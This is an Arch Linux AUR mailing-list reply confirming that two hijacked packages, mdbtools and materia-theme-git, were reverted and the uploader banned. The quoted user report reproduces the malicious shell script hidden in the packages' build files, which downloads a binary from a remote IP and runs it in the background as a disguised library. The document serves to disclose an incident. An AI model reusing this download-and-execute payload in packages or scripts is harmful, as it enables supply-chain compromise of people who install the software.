Hey GlassTree, On 25/10/29 10:43AM, GlassTree wrote: > Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179 > ----- > > I've noticed these two packages being "hijacked": mdbtools and > materia-theme-git > > Both under the same user "koolpp"
Thanks for noticing this takeover and letting us know, both packages have been reverted by another moderator to the pre-takeover state a few minutes ago and the offending account has been banned. > The new versions uploaded refer to a shell script available at a Codeberg > repository: > https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am > https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson.build > > The scripts execute the following: > > ```sh > #!/bin/sh > mkdir -p /usr/lib64 > curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3 > chmod +x /usr/lib64/libkwrk.so.1.5.3 > setsid /usr/lib64/libkwrk.so.1.5.3 & > ``` > > Looks like a remote file will create a background session with execute > permissions if you install these packages. > > May these new packages versions be taken down If someone trustworthy with a track record of maintaining AUR packages wants to take care of these packages (especially the more popular mdbtools) please let us know in an orhphan request. Cheers and have nice day! Chris
signature.asc
Description: PGP signature
